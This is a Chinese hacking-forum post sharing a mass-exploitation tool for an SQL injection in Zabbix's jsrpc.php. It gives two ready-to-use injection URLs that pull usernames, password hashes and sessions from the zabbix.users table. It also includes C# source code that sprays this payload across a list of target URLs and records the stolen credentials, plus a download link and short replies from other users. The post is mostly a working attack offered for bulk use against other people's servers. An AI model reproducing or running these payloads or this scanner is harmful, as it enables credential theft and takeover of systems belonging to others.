HanDs
管理员

[附件] Zabbix批量注入工具+exp 



通过邮件披露了Zabbix软件的jsrpc.php文件在处理profileIdx2参数时存在insert方式的SQL注入漏洞,与官方通告的latest.php文件在处理toggle_ids参数时存在insert方式的SQL注入漏洞属于同一类型的漏洞,只是攻击的位置不同。攻击者可以使用guest账户或者已经认证的账户登录,然后利用此漏洞直接获取服务器的操作系统权限。



下载地址:http://pan.baidu.com/s/1bpbtPDH





获取账号密码:

1/jsrpc.php?type=9&method=screen.get×tamp=1471403798083&pageFile=history.php&profileIdx=web.item.graph&profileIdx2=1+or+updatexml(1,(select(select+concat(0x7e,alias,0x7e,passwd,0x7e))+from+zabbix.users+LIMIT+0,1),1)+or+1=1)%23&updateProfile=true&period=3600&stime=20160817050632&resourcetype=17
获取session:
1/jsrpc.php?type=9&method=screen.get×tamp=1471403798083&pageFile=history.php&profileIdx=web.item.graph&profileIdx2=1%20or%20(select%201%20from%20(select%20count(*),concat((select%20(select%20concat(passwd))%20from%20zabbix.users%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%20or%201=1)%23&updateProfile=true&period=3600&stime=20160817050632&resourcetype=17


源码

01string Url = textBoxUrl.Text;
02string[] Urls = Url.Split(Environment.NewLine.ToCharArray());
03string ExP = "/jsrpc.php?type=9&method=screen.get×tamp=1471403798083&pageFile=history.php&profileIdx=web.item.graph&profileIdx2=1+or+updatexml(1,(select(select+concat(0x7e,alias,0x7e,passwd,0x7e))+from+zabbix.users+LIMIT+0,1),1)+or+1=1)%23&updateProfile=true&period=3600&stime=20160817050632&resourcetype=17";
04for (int i = 0; i < Urls.Length; i++)
05{
06    string BaseUrl = Urls[i].Trim();//设置请求的地址
07    try
08    {
09        if (BaseUrl.Length != 0)
10        {
11            if (BaseUrl.IndexOf("http") == -1)
12            {
13                BaseUrl ="http://"+ BaseUrl ;
14            }
15            Console.WriteLine(BaseUrl); HttpCode = newHttpCode();
16            CookieContainer cc = new CookieContainer(); //请求自动处理cookie
17            HttpResults hr = HttpCode.GetHtml(BaseUrl + ExP, cc);//发起请求
18            if (hr.Html.Length != 0)
19            {
20                string Res = HttpCode.GetStringMid(hr.Html,"syntax error:""]");
21                if (Res.Length != 0)
22                {
23                    textBoxData.AppendText(BaseUrl + "----" + Res + "\r\n");
24                }
25                else
26                {
27                    textBoxData.AppendText(BaseUrl + "----不存在此漏洞" "\r\n");
28                }
29            }
30            else
31            {
32                textBoxData.AppendText(BaseUrl + "----不存在此漏洞" "\r\n");
33            }
34  
35        }
36          
37    }
38    catch (Exception)
39    {
40          
41        throw;
42    }
43      
44}
45textBoxData.AppendText("\r\n----------------注入完毕");


学习中请遵守法律法规,本网站内容均来自于互联网,本网站不负担法律责任

1 个附件 售价 大小 下载 时间

Zabbix批量注入工具.zip 0 金币 1.64M 12 次 2016-9-12

Zabbix 批量注入工具 + exp
#1楼
发帖时间:2016-9-12   |   查看数:0   |   回复数:2
Zbc_ice
勿忘我LV19
好东西



来自iPhone
2016-9-17 #2楼
1151179818
罂粟成员
下载了

2016-9-17 #3楼
游客组
快速回复